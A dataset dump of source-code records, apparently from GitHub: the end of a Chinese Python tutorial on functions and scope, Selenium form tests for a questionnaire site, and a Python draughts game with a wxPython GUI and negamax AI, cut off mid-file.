函数执行完成之后,会重新回到之前的程序中,继续执行后续的代码\nsay_hello()\n\nprint(name)\n```\n\n> 用 **单步执行 F8 和 F7** 观察以下代码的执行过程\n\n- 定义好函数之后,只表示这个函数封装了一段代码而已\n- 如果不主动调用函数,函数是不会主动执行的\n\n#### 思考\n\n- 能否将 **函数调用** 放在 **函数定义** 的上方?\n - 不能!\n - 因为在 **使用函数名** 调用函数之前,必须要保证 `Python` 已经知道函数的存在\n - 否则控制台会提示 `NameError: name 'say_hello' is not defined` (**名称错误:say_hello 这个名字没有被定义**)\n\n### PyCharm 的调试工具\n\n- **F8 Step Over** 可以单步执行代码,会把函数调用看作是一行代码直接执行\n- **F7 Step Into** 可以单步执行代码,如果是函数,会进入函数内部\n\n### 函数的文档注释\n\n- 在开发中,如果希望给函数添加注释,应该在 **定义函数** 的下方,使用 **连续的三对引号**\n- 在 **连续的三对引号** 之间编写对函数的说明文字\n- 在 **函数调用** 位置,使用快捷键 `CTRL + Q` 可以查看函数的说明信息\n\n> 注意:因为 **函数体相对比较独立**,**函数定义的上方**,应该和其他代码(包括注释)保留 **两个空行**\n\n## 函数的参数\n\n**演练需求**\n\n1. 开发一个 `sum_2_num` 的函数\n2. 函数能够实现 **两个数字的求和** 功能\n\n演练代码如下:\n\n```\ndef sum_2_num():\n\n num1 = 10\n num2 = 20\n result = num1 + num2\n\n print(\"%d + %d = %d\" % (num1, num2, result))\n\nsum_2_num()\n```\n\n**思考一下存在什么问题**\n\n> 函数只能处理 **固定数值** 的相加\n\n**如何解决?**\n\n- 如果能够把需要计算的数字,在调用函数时,传递到函数内部就好了!\n\n### 函数参数的使用\n\n- 在函数名的后面的小括号内部填写 **参数**\n- 多个参数之间使用 `,` 分隔\n\n```\ndef sum_2_num(num1, num2):\n\n result = num1 + num2\n \n print(\"%d + %d = %d\" % (num1, num2, result))\n\nsum_2_num(50, 20)\n```\n\n### 参数的作用\n\n- **函数**,把 **具有独立功能的代码块** 组织为一个小模块,在需要的时候 **调用**\n- **函数的参数**,增加函数的 **通用性**,针对 **相同的数据处理逻辑**,能够 **适应更多的数据**\n 1. 在函数 **内部**,把参数当做 **变量** 使用,进行需要的数据处理\n 2. 函数调用时,按照函数定义的**参数顺序**,把 **希望在函数内部处理的数据**,**通过参数** 传递\n\n### 形参和实参\n\n- **形参**:**定义** 函数时,小括号中的参数,是用来接收参数用的,在函数内部 **作为变量使用**\n- **实参**:**调用** 函数时,小括号中的参数,是用来把数据传递到 **函数内部** 用的\n\n## 函数的返回值\n\n- 在程序开发中,有时候,会希望 **一个函数执行结束后,告诉调用者一个结果**,以便调用者针对具体的结果做后续的处理\n- **返回值** 是函数 **完成工作**后,**最后** 给调用者的 **一个结果**\n- 在函数中使用 `return` 关键字可以返回结果\n- 调用函数一方,可以 **使用变量** 来 **接收** 函数的返回结果\n\n> 注意:`return` 表示返回,后续的代码都不会被执行\n\n```\ndef sum_2_num(num1, num2):\n \"\"\"对两个数字的求和\"\"\"\n\n return num1 + num2\n\n# 调用函数,并使用 result 变量接收计算结果\nresult = sum_2_num(10, 20)\n\nprint(\"计算结果是 %d\" % result)\n```\n\n## 函数的嵌套调用\n\n- 一个函数里面 **又调用** 了 **另外一个函数**,这就是 **函数嵌套调用**\n\n+ 如果函数 `test2` 中,调用了另外一个函数 `test1`\n + 那么执行到调用 `test1` 函数时,会先把函数 `test1` 中的任务都执行完\n + 才会回到 `test2` 中调用函数 `test1` 的位置,继续执行后续的代码\n\n```\ndef test1():\n\n print(\"*\" * 50)\n print(\"test 1\")\n print(\"*\" * 50)\n\n\ndef test2():\n\n print(\"-\" * 50)\n print(\"test 2\")\n \n test1()\n \n print(\"-\" * 50)\n\ntest2()\n```\n\n### 函数嵌套的演练 —— 打印分隔线\n\n> 体会一下工作中 **需求是多变** 的\n\n**需求 1**\n\n- 定义一个 `print_line` 函数能够打印 `*` 组成的 **一条分隔线**\n\n```\ndef print_line(char):\n\n print(\"*\" * 50)\n```\n\n**需求 2**\n\n- 定义一个函数能够打印 **由任意字符组成** 的分隔线\n\n```\ndef print_line(char):\n\n print(char * 50)\n \n```\n\n**需求 3**\n\n- 定义一个函数能够打印 **任意重复次数** 的分隔线\n\n```\ndef print_line(char, times):\n\n print(char * times)\n```\n\n**需求 4**\n\n- 定义一个函数能够打印 **5 行** 的分隔线,分隔线要求符合**需求 3**\n\n> 提示:工作中针对需求的变化,应该冷静思考,**不要轻易修改之前已经完成的,能够正常执行的函数**!\n\n```\ndef print_line(char, times):\n\n print(char * times)\n\n\ndef print_lines(char, times):\n\n row = 0\n \n while row < 5:\n print_line(char, times)\n\n row += 1\n```\n\n\n\n### 用模块管理函数\n\n对于任何一种编程语言来说,给变量、函数这样的标识符起名字都是一个让人头疼的问题,因为我们会遇到命名冲突这种尴尬的情况。最简单的场景就是在同一个.py文件中定义了两个同名函数,由于Python没有函数重载的概念,那么后面的定义会覆盖之前的定义,也就意味着两个函数同名函数实际上只有一个是存在的。\n\n```\ndef foo():\n print('hello, world!')\n\n\ndef foo():\n print('goodbye, world!')\n\n\n# 下面的代码会输出什么呢?\nfoo()\n```\n\n当然上面的这种情况我们很容易就能避免,但是如果项目是由多人协作进行团队开发的时候,团队中可能有多个程序员都定义了名为`foo`的函数,那么怎么解决这种命名冲突呢?答案其实很简单,Python中每个文件就代表了一个模块(module),我们在不同的模块中可以有同名的函数,在使用函数的时候我们通过`import`关键字导入指定的模块就可以区分到底要使用的是哪个模块中的`foo`函数,代码如下所示。\n\n```\nmodule1.py\ndef foo():\n print('hello, world!')\nmodule2.py\ndef foo():\n print('goodbye, world!')\ntest.py\nfrom module1 import foo\n\n# 输出hello, world!\nfoo()\n\nfrom module2 import foo\n\n# 输出goodbye, world!\nfoo()\n```\n\n也可以按照如下所示的方式来区分到底要使用哪一个`foo`函数。\n\n```\ntest.py\nimport module1 as m1\nimport module2 as m2\n\nm1.foo()\nm2.foo()\n```\n\n但是如果将代码写成了下面的样子,那么程序中调用的是最后导入的那个`foo`,因为后导入的foo覆盖了之前导入的`foo`。\n\n```\ntest.py\nfrom module1 import foo\nfrom module2 import foo\n\n# 输出goodbye, world!\nfoo()\ntest.py\nfrom module2 import foo\nfrom module1 import foo\n\n# 输出hello, world!\nfoo()\n```\n\n需要说明的是,如果我们导入的模块除了定义函数之外还中有可以执行代码,那么Python解释器在导入这个模块时就会执行这些代码,事实上我们可能并不希望如此,因此如果我们在模块中编写了执行代码,最好是将这些执行代码放入如下所示的条件中,这样的话除非直接运行该模块,if条件下的这些代码是不会执行的,因为只有直接执行的模块的名字才是\"__main__\"。\n\n```\nmodule3.py\ndef foo():\n pass\n\n\ndef bar():\n pass\n\n\n# __name__是Python中一个隐含的变量它代表了模块的名字\n# 只有被Python解释器直接执行的模块的名字才是__main__\nif __name__ == '__main__':\n print('call foo()')\n foo()\n print('call bar()')\n bar()\ntest.py\nimport module3\n\n# 导入module3时 不会执行模块中if条件成立时的代码 因为模块的名字是module3而不是__main__\n```\n\n\n\n### 练习\n\n#### 练习1:实现判断一个数是不是回文数的函数。\n\n参考答案:\n\n```\ndef is_palindrome(num):\n \"\"\"判断一个数是不是回文数\"\"\"\n temp = num\n total = 0\n while temp > 0:\n total = total * 10 + temp % 10\n temp //= 10\n return total == num\n```\n\n#### 练习2:实现判断一个数是不是素数的函数。\n\n参考答案:\n\n```\ndef is_prime(num):\n \"\"\"判断一个数是不是素数\"\"\"\n for factor in range(2, int(num ** 0.5) + 1):\n if num % factor == 0:\n return False\n return True if num != 1 else False\n```\n\n### 拓展:变量的作用域\n\n最后,我们来讨论一下Python中有关变量作用域的问题。\n\n```\ndef foo():\n b = 'hello'\n\n # Python中可以在函数内部再定义函数\n def bar():\n c = True\n print(a)\n print(b)\n print(c)\n\n bar()\n # print(c) # NameError: name 'c' is not defined\n\n\nif __name__ == '__main__':\n a = 100\n # print(b) # NameError: name 'b' is not defined\n foo()\n```\n\n上面的代码能够顺利的执行并且打印出100、hello和True,但我们注意到了,在`bar`函数的内部并没有定义`a`和`b`两个变量,那么`a`和`b`是从哪里来的。我们在上面代码的`if`分支中定义了一个变量`a`,这是一个全局变量(global variable),属于全局作用域,因为它没有定义在任何一个函数中。在上面的`foo`函数中我们定义了变量`b`,这是一个定义在函数中的局部变量(local variable),属于局部作用域,在`foo`函数的外部并不能访问到它;但对于`foo`函数内部的`bar`函数来说,变量`b`属于嵌套作用域,在`bar`函数中我们是可以访问到它的。`bar`函数中的变量`c`属于局部作用域,在`bar`函数之外是无法访问的。事实上,Python查找一个变量时会按照“局部作用域”、“嵌套作用域”、“全局作用域”和“内置作用域”的顺序进行搜索,前三者我们在上面的代码中已经看到了,所谓的“内置作用域”就是Python内置的那些标识符,我们之前用过的`input`、`print`、`int`等都属于内置作用域。\n\n再看看下面这段代码,我们希望通过函数调用修改全局变量`a`的值,但实际上下面的代码是做不到的。\n\n```\ndef foo():\n a = 200\n print(a) # 200\n\n\nif __name__ == '__main__':\n a = 100\n foo()\n print(a) # 100\n```\n\n在调用`foo`函数后,我们发现`a`的值仍然是100,这是因为当我们在函数`foo`中写`a = 200`的时候,是重新定义了一个名字为`a`的局部变量,它跟全局作用域的`a`并不是同一个变量,因为局部作用域中有了自己的变量`a`,因此`foo`函数不再搜索全局作用域中的`a`。如果我们希望在`foo`函数中修改全局作用域中的`a`,代码如下所示。\n\n```\ndef foo():\n global a\n a = 200\n print(a) # 200\n\n\nif __name__ == '__main__':\n a = 100\n foo()\n print(a) # 200\n```\n\n我们可以使用`global`关键字来指示`foo`函数中的变量`a`来自于全局作用域,如果全局作用域中没有`a`,那么下面一行的代码就会定义变量`a`并将其置于全局作用域。同理,如果我们希望函数内部的函数能够修改嵌套作用域中的变量,可以使用`nonlocal`关键字来指示变量来自于嵌套作用域,请大家自行试验。\n\n在实际开发中,我们应该尽量减少对全局变量的使用,因为全局变量的作用域和影响过于广泛,可能会发生意料之外的修改和使用,除此之外全局变量比局部变量拥有更长的生命周期,可能导致对象占用的内存长时间无法被[垃圾回收](https://zh.wikipedia.org/wiki/垃圾回收_(計算機科學))。事实上,减少对全局变量的使用,也是降低代码之间耦合度的一个重要举措,同时也是对[迪米特法则](https://zh.wikipedia.org/zh-hans/得墨忒耳定律)的践行。减少全局变量的使用就意味着我们应该尽量让变量的作用域在函数的内部,但是如果我们希望将一个局部变量的生命周期延长,使其在定义它的函数调用结束后依然可以使用它的值,这时候就需要使用[闭包](https://zh.wikipedia.org/wiki/闭包_(计算机科学)),这个我们在后续的内容中进行讲解。\n\n\n"
},
{
"alpha_fraction": 0.5962441563606262,
"alphanum_fraction": 0.7840375304222107,
"avg_line_length": 41.20000076293945,
"blob_id": "85902d195c0dd496b35631c0acee941587462bea",
"content_id": "4db05905ad6ebe401a472791530044a3b8b1a3d8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 265,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 5,
"path": "/docs/获取计算机网络pdf.md",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
"text": "关注公众号:CookDev 回复:计算机网络\n\n\n\n\n\n\n"
}
] | 13 |
xahgmah/questionnaire_tests
|
https://github.com/xahgmah/questionnaire_tests
|
c8ccaaab5b16d9e79660ff0711d7d904207426e6
|
eb67d3d3f29b986a04cd6ad27a70d35ea3a6b32b
|
da858dc4d4add31231ae51f621d45b71a153d181
|
refs/heads/master
| 2021-04-03T23:27:05.979666 | 2016-06-03T17:02:51 | 2016-06-03T17:02:51 | 60,363,171 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6209408044815063,
"alphanum_fraction": 0.6245827078819275,
"avg_line_length": 44.136985778808594,
"blob_id": "40944d52f556da98756a676cf107078db4bc6190",
"content_id": "8b9c7948a0d9a58b93fb5308988f1f7e9974c26b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3295,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 73,
"path": "/base_step.py",
"repo_name": "xahgmah/questionnaire_tests",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\nfrom grail import step\n\n\nclass BaseStep(object):\n FIELD_TEXT = \"text\"\n FIELD_TEXTAREA = \"textarea\"\n FIELD_EMAIL = \"email\"\n FIELD_RADIO = \"radio\"\n FIELD_CHECKBOX = \"checkbox\"\n TEST_DATA = {\n FIELD_TEXT: \"test\",\n FIELD_TEXTAREA: \"test\",\n FIELD_EMAIL: \"[email protected]\",\n }\n next_url = None\n test_url = None\n fields = []\n submit_button = \"\"\n\n def __init__(self, testcase):\n self.testcase = testcase\n self.browser = self.testcase.browser\n self.browser.get(self.testcase.base_url + self.test_url)\n\n @step\n def _test_empty_data(self):\n required_fields = 0\n for name, properties in self.fields.iteritems():\n if properties[1] == 'required':\n required_fields += 1\n self.testcase.assertIn('Edx questionary', self.browser.title)\n self.browser.find_element_by_class_name(\"btn-\" + self.submit_button).click()\n self.testcase.assertIn(\"This field is required.\", self.browser.page_source)\n self.testcase.assertEqual(self.testcase.base_url + self.test_url, self.browser.current_url)\n\n @step\n def _test_wrong_email(self):\n for name, properties in self.fields.iteritems():\n if properties[0] == \"email\":\n self.browser.find_element_by_name(name).send_keys(\"test\")\n self.browser.find_element_by_class_name(\"btn-\" + self.submit_button).click()\n self.testcase.assertIn(\"Enter a valid email address.\", self.browser.page_source)\n self.testcase.assertEqual(self.testcase.base_url + self.test_url, self.browser.current_url)\n\n @step\n def _test_correct_data(self):\n for name, properties in self.fields.iteritems():\n if properties[0] == BaseStep.FIELD_RADIO:\n self.browser.find_element_by_xpath(\"//label[@for='id_\" + name + \"_0']\").click()\n elif properties[0] == BaseStep.FIELD_CHECKBOX:\n self.browser.find_element_by_xpath(\"//input[@name='\" + name + \"']/following-sibling::*\").click()\n else:\n test_data = self.TEST_DATA[properties[0]]\n field = self.browser.find_element_by_name(name)\n field.clear()\n field.send_keys(test_data)\n self.browser.find_element_by_class_name(\"btn-\" + self.submit_button).click()\n self.testcase.assertFalse(self.browser.find_elements_by_class_name(\"errorlist\"))\n self.testcase.assertNotEqual(self.browser.current_url, self.testcase.base_url + self.test_url)\n self.testcase.assertEqual(self.browser.current_url, self.testcase.base_url + self.next_url)\n\n @step\n def _test_saved_data(self):\n self.browser.get(self.testcase.base_url + self.test_url)\n for name, properties in self.fields.iteritems():\n field = self.browser.find_element_by_name(name)\n if properties[0] == BaseStep.FIELD_TEXTAREA:\n self.testcase.assertEqual(field.text, self.TEST_DATA[properties[0]])\n elif properties[0] in [BaseStep.FIELD_RADIO, BaseStep.FIELD_CHECKBOX]:\n self.testcase.assertNotEqual(field.get_attribute(\"value\"), \"\")\n else:\n self.testcase.assertEqual(field.get_attribute(\"value\"), self.TEST_DATA[properties[0]])\n"
},
{
"alpha_fraction": 0.40909090638160706,
"alphanum_fraction": 0.6590909361839294,
"avg_line_length": 13.666666984558105,
"blob_id": "865ec854303b4c812240df5a7ae9f58c085d3c5e",
"content_id": "73ef1ac850ee0d3faa3a2dcbe5f051dbd62499be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 44,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 3,
"path": "/requirements.txt",
"repo_name": "xahgmah/questionnaire_tests",
"src_encoding": "UTF-8",
"text": "grail==1.0.9\nselenium==2.53.2\nwheel==0.26.0\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.75,
"avg_line_length": 16.571428298950195,
"blob_id": "288c0ae494817206d942c5c61f77f281a4c8eb68",
"content_id": "3b232205e84bc74115adf63d1a10f3883af35ac0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 124,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 7,
"path": "/README.md",
"repo_name": "xahgmah/questionnaire_tests",
"src_encoding": "UTF-8",
"text": "# questionnaire_tests\nSelenium tests for questionnaire form\n\n```\npip install -r requirements.txt\npython ./seltests.py \n```\n\n"
},
{
"alpha_fraction": 0.6001121997833252,
"alphanum_fraction": 0.6068423986434937,
"avg_line_length": 32.622642517089844,
"blob_id": "0d9b4690795ae497ab4ad2b6867fc878afad2863",
"content_id": "62bfacc36326e061f53054238d89afbbb790261b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1783,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 53,
"path": "/steps.py",
"repo_name": "xahgmah/questionnaire_tests",
"src_encoding": "UTF-8",
"text": "from base_step import BaseStep\n\n\nclass FirstStep(BaseStep):\n test_url = \"/en/pricing/\"\n next_url = \"/en/questionnaire/2/\"\n fields = {\n \"first_name\": (BaseStep.FIELD_TEXT, \"required\"),\n \"second_name\": (BaseStep.FIELD_TEXT, \"required\"),\n BaseStep.FIELD_EMAIL: (BaseStep.FIELD_EMAIL, \"required\"),\n \"organization\": (BaseStep.FIELD_TEXT, \"required\"),\n \"job_title\": (BaseStep.FIELD_TEXT, \"required\"),\n \"website\": (BaseStep.FIELD_TEXT, \"required\"),\n \"purpose\": (BaseStep.FIELD_TEXTAREA, \"required\")\n }\n submit_button = \"next\"\n\n\nclass SecondStep(BaseStep):\n test_url = \"/en/questionnaire/2/\"\n next_url = \"/en/questionnaire/3/\"\n fields = {\n \"active_users2\": (BaseStep.FIELD_RADIO, \"required\"),\n \"registered_users2\": (BaseStep.FIELD_RADIO, \"required\"),\n \"hosting\": (BaseStep.FIELD_RADIO, \"required\"),\n \"mobileapp\": (BaseStep.FIELD_RADIO, \"required\"),\n }\n submit_button = \"next\"\n\n\nclass ThirdStep(BaseStep):\n test_url = \"/en/questionnaire/3/\"\n next_url = \"/en/questionnaire/4/\"\n fields = {\n \"localization2\": (BaseStep.FIELD_TEXTAREA, \"required\"),\n \"certificates2\": (BaseStep.FIELD_CHECKBOX, \"required\"),\n \"lit2\": (BaseStep.FIELD_CHECKBOX, \"required\"),\n \"sso2\": (BaseStep.FIELD_CHECKBOX, \"required\"),\n \"scorm\": (BaseStep.FIELD_CHECKBOX, \"required\"),\n \"commerce\": (BaseStep.FIELD_CHECKBOX, \"required\"),\n \"microsites\": (BaseStep.FIELD_CHECKBOX, \"required\"),\n }\n submit_button = \"next\"\n\n\nclass ForthStep(BaseStep):\n test_url = \"/en/questionnaire/4/\"\n next_url = \"/en/\"\n fields = {\n \"xb_enable\": (BaseStep.FIELD_TEXTAREA, \"\"),\n \"xb_dev\": (BaseStep.FIELD_TEXTAREA, \"\"),\n }\n submit_button = \"finish\"\n\n"
},
{
"alpha_fraction": 0.5574672818183899,
"alphanum_fraction": 0.5602202415466309,
"avg_line_length": 26.94230842590332,
"blob_id": "496862b13a8462e73dc344b909ee68010f1de119",
"content_id": "9382697e8b9a966bab27e398a9c9420c4cf3b855",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1453,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 52,
"path": "/seltests.py",
"repo_name": "xahgmah/questionnaire_tests",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\nimport unittest\nimport steps\n\n\nclass QuestionaryTestCase(unittest.TestCase):\n def setUp(self):\n self.browser = webdriver.Chrome(\"./chromedriver\")\n self.base_url = \"https://raccoongang.com\"\n\n def step1(self):\n self.step = steps.FirstStep(self)\n self.step._test_empty_data()\n self.step._test_wrong_email()\n self.step._test_correct_data()\n self.step._test_saved_data()\n\n def step2(self):\n self.step = steps.SecondStep(self)\n self.step._test_empty_data()\n self.step._test_correct_data()\n self.step._test_saved_data()\n\n def step3(self):\n self.step = steps.ThirdStep(self)\n self.step._test_empty_data()\n self.step._test_correct_data()\n self.step._test_saved_data()\n\n def step4(self):\n self.step = steps.ForthStep(self)\n self.step._test_correct_data()\n\n def list_of_steps(self):\n for name in sorted(dir(self)):\n if name.startswith(\"step\"):\n yield name, getattr(self, name)\n\n def test_steps(self):\n for name, step in self.list_of_steps():\n try:\n print \"========== %s ==========\" % name\n step()\n except Exception as e:\n self.fail(\"{} failed ({}: {})\".format(step, type(e), e))\n\n def tearDown(self):\n self.step.browser.quit()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n"
}
] | 5 |
llislex/py_draugth
|
https://github.com/llislex/py_draugth
|
e3012b1e948b5e1eb3b6674a018b7ef3969c8e33
|
1b31e8321861ec4ddf7ab7da35aac71c2db8d1ef
|
276b46e011efa288b46e23eae14ed2aadb0f6312
|
refs/heads/master
| 2022-02-11T16:29:39.268791 | 2022-01-04T21:09:05 | 2022-01-04T21:09:05 | 145,456,865 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.61756831407547,
"alphanum_fraction": 0.6288163065910339,
"avg_line_length": 21.780487060546875,
"blob_id": "c003f8618db13690d9a4375bfb8bdf0b24604c99",
"content_id": "d7510ad1d5313e5e2b1a7bc5f71b263e6733095e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1867,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 82,
"path": "/ut.py",
"repo_name": "llislex/py_draugth",
"src_encoding": "UTF-8",
"text": "import game_board\nimport game_rules\nimport random\nimport game_ai_player\nimport time\nimport threading\n\n\nb = game_board.Board()\nb.initial()\nrules = game_rules.Rules(game_board._n)\nprint(b)\ndepth = 2\n\n'''\nprint(list(b.units(True)))\nprint(list(b.units(False)))\n\nrules = game_rules.Rules(game_board._n)\nfor mx in rules.play(b, True):\n bx = rules.transformed_board(b, mx)\n print(bx)\n''' \n\n'''\nclass GameTreeBuilder(threading.Thread):\n def __init__(self, board, rules, turn, m0, depth):\n threading.Thread.__init__(self)\n self.depth = depth\n self.board = board\n self.rules = rules\n self.turn = turn\n self.tree = m0\n self.tooktime = 0\n\n def run(self):\n start = time.time()\n self.tree = game_ai_player.build_game_tree(self.tree, 2, self.board, self.rules, self.turn, self.depth)\n end = time.time()\n self.tooktime = end - start\n\nN = 8\nb = game_board.Board(N)\nb.initial()\nrules = game_rules.Rules(N)\ndepth = 4\nturn = 1\nthreads = []\ngame_tree = '0 x 42\\n'\nfor mx in rules.play(b, turn):\n bx = b.clone()\n rules.apply(bx, mx)\n a_move = game_ai_player.move_to_str(mx, 1, -game_ai_player.max_value)+'\\n'\n tx = GameTreeBuilder(bx, rules, -turn, a_move, depth-1)\n threads.append(tx)\n tx.start()\n \nfor tx in threads:\n tx.join()\n game_tree += tx.tree\n \nfor tx in threads: \n print \"tree size\", len(tx.tree), \"bytes\", \"took time\", tx.tooktime, \"sec\"\n print \"\"\n\ntt0 = time.time()\ngame_tree_lines = game_tree.splitlines()\ntt1 = time.time()\nn = game_ai_player.TextNode(game_tree_lines, 0)\nr, move_list = game_ai_player.maxi(n)\ntt2 = time.time()\nprint \"result\", r\nprint \"split\", tt1-tt0, \"sec\"\nprint \"minimax\", tt2-tt1, \"sec\"\n\nfor move_index in move_list:\n print game_ai_player.TextNode(game_tree_lines, move_index)\n\n\nfor ln in game_tree_lines:\n print ln\n'''"
},
{
"alpha_fraction": 0.5273542404174805,
"alphanum_fraction": 0.5346572995185852,
"avg_line_length": 27.694852828979492,
"blob_id": "e3e8d60cccac143ce5f9179627814d1aadb2eb6c",
"content_id": "13af32ca0207f22b8afce0df032d2c37480388f3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7805,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 272,
"path": "/game_gui.py",
"repo_name": "llislex/py_draugth",
"src_encoding": "UTF-8",
"text": "import wx\nimport threading\nimport game_board\nimport game_rules\nimport random\nimport copy\nimport time\nimport game_ai_player\n\n\ndef col_index(n, size):\n return (n - 1) % (size // 2)\n\n\ndef row(n, size):\n return (n - 1) // (size // 2)\n\n\ndef col(n, size):\n return col_index(n, size) * 2 + 1 - (row(n, size) % 2)\n\n\n_hit = 1\n_move = 0\n\n_human = 0\n_ai = 1\n\n_black_move = False\n_white_move = True\n\n\nclass MainForm(wx.Frame):\n def __init__(self, board, rules):\n wx.Frame.__init__(self, None, size=(400, 400))\n menu_bar = wx.MenuBar()\n menu = wx.Menu()\n menu_item = wx.MenuItem(menu, wx.ID_NEW, \"New game\", \"Start a new game\")\n menu.Append(menu_item)\n menu_bar.Append(menu, '&Game')\n self.SetMenuBar(menu_bar)\n self.Bind(wx.EVT_MENU, self.start_new_game, menu_item)\n\n self.num_buttons = game_board._N\n self.btn = []\n self.selected_btn = []\n self.move_type = _hit # 0 - move 1 - hit\n self.move_list = []\n self.step = 0\n sz = self.GetSize()\n h = 3 * sz[0] // N // 4\n w = 3 * sz[1] // N // 4\n\n for i in range(0, self.num_buttons):\n x = col(i + 1, N) * w\n y = row(i + 1, N) * h\n btn = wx.Button(self, pos=(x, y), size=(w, h))\n btn.SetFont(btn.GetFont().MakeLarger().MakeLarger())\n self.btn.append(btn)\n\n self.current_turn = _white_move\n self.white_player = _human\n self.black_player = _human\n self.board = board\n self.rules = rules\n self.start_new_game(None)\n # self.set_board(board, rules, player)\n\n def player(self):\n return self.white_player if self.current_turn == _white_move else self.black_player\n\n def start_new_game(self, evt):\n self.Bind(EVT_MOVE, self.on_ai_move)\n self.current_turn = _white_move\n self.white_player = _human\n self.black_player = _ai\n self.board.initial()\n self.set_board(self.board, self.rules, self.current_turn)\n\n def set_board(self, board, rules, turn):\n for i in range(0, self.num_buttons):\n if board.empty(i):\n self.btn[i].SetLabel(' ')\n else:\n self.btn[i].SetLabel(board.dot(i))\n # build move list for the board\n if self.player() == _human:\n self.move_list = rules.move_list(board, turn)\n self.init_filter()\n else:\n ai_thread = AI(self, self.board, self.rules, self.current_turn)\n ai_thread.start()\n\n def _bind_button(self, btn):\n if btn not in self.selected_btn:\n self.selected_btn.append(btn)\n btn.Bind(wx.EVT_BUTTON, self.on_button_click)\n\n def _unbind_buttons(self):\n for btn in self.selected_btn:\n btn.Unbind(wx.EVT_BUTTON)\n self.selected_btn = []\n\n def _move_place(self, move):\n if self.step == 0:\n return game_rules._from_str(move[-1])\n else:\n return game_rules._from_str(move[-self.step * 2])\n\n def init_filter(self):\n self.step = 0\n self.selected_btn = []\n for move in self.move_list:\n button = self.btn[self._move_place(move)]\n self._bind_button(button)\n\n def set_filter(self, point):\n new_list = []\n for move in self.move_list:\n if len(move) > self.step:\n if self._move_place(move) == point:\n new_list.append(move)\n self.move_list = new_list\n self.step += 1\n self._unbind_buttons()\n if not self.done():\n for move in self.move_list:\n if len(move) > self.step:\n num = self._move_place(move)\n self._bind_button(self.btn[num])\n\n def done(self):\n return len(self.move_list) == 1 or len(self.move_list) == 0\n\n def on_button_click(self, evt):\n target = evt.GetEventObject()\n n = self.btn.index(target)\n self.set_filter(n)\n if self.done():\n self._make_move(self.move_list[0])\n\n def _make_move(self, a_move):\n self.rules.apply(self.board, a_move)\n self.current_turn = not self.current_turn\n self.set_board(self.board, self.rules, self.current_turn)\n\n def on_ai_move(self, evt):\n #\"ai move\"\n a_move = evt.GetValue()\n self._make_move(a_move)\n\n\nclass MoveEvent(wx.PyCommandEvent):\n def __init__(self, value=None):\n wx.PyCommandEvent.__init__(self, EVT_MOVE_TYPE, -1)\n self._value = value\n\n def GetValue(self):\n return self._value\n\n\n'''\nclass AI0(threading.Thread):\n def __init__(self, parent, board, rules, turn):\n threading.Thread.__init__(self)\n self.parent = parent\n self.board = board\n self.rules = rules\n self.turn = turn\n\n def run(self):\n # dumb player\n move_list = self.rules.move_list(self.board, self.turn)\n if len(move_list) > 0:\n time.sleep(1)\n a_move = random.choice(move_list)\n evt = MoveEvent(a_move)\n wx.PostEvent(self.parent, evt)\n else:\n # resign\n pass\n\n\ndef nodes(root):\n if root is not None:\n r = 1\n for c in root.child:\n r += nodes(c)\n return r\n else:\n return 0\n'''\n\n\nclass GameTreeBuilder(threading.Thread):\n def __init__(self, move, board, rules, turn, depth):\n threading.Thread.__init__(self)\n self.depth = depth\n self.board = board\n self.move = move\n self.rules = rules\n self.turn = turn\n self.tooktime = 0\n self.evaluation = 0\n\n def run(self):\n start = time.time()\n alpha = -game_ai_player.max_value\n beta = game_ai_player.max_value\n self.evaluation = game_ai_player.negamax(self.board, self.rules, self.turn, self.depth, alpha, beta)\n end = time.time()\n self.tooktime = end - start\n\n\nclass AI(threading.Thread):\n def __init__(self, parent, board, rules, turn):\n threading.Thread.__init__(self)\n self.parent = parent\n self.board = board\n self.rules = rules\n self.turn = turn\n random.seed()\n\n def run(self):\n threads = []\n depth = 9\n t0 = time.time()\n moves = self.rules.move_list(self.board, self.turn)\n if len(moves) > 1:\n for mx in moves:\n bx = copy.deepcopy(b) #b.clone()\n self.rules.apply(bx, mx)\n tx = GameTreeBuilder(mx, bx, self.rules, not self.turn, depth - 1)\n threads.append(tx)\n tx.start()\n for tx in threads:\n tx.join()\n t1 = time.time()\n if len(threads) > 0:\n e = max(threads, key=lambda item: item.evaluation) if self.turn else min(threads, key=lambda item: item.evaluation)\n for tx in threads:\n print(tx.board)\n print(\"eval \", tx.evaluation, \"move \", tx.move)\n print(e.evaluation)\n best_move_threads = list(filter(lambda x: x.evaluation == e.evaluation, threads))\n best_tx = random.choice(best_move_threads)\n\n evt = MoveEvent(best_tx.move)\n wx.PostEvent(self.parent, evt)\n print(\"build tree\", t1 - t0, \"depth\", depth)\n else:\n # resign\n pass\n elif len(moves) == 1:\n evt = MoveEvent(moves[0])\n wx.PostEvent(self.parent, evt)\n else:\n pass\n\n\nN = game_board._n\nb = game_board.Board()\nr = game_rules.Rules(N)\n\nEVT_MOVE_TYPE = wx.NewEventType()\nEVT_MOVE = wx.PyEventBinder(EVT_MOVE_TYPE, 1)\napp = 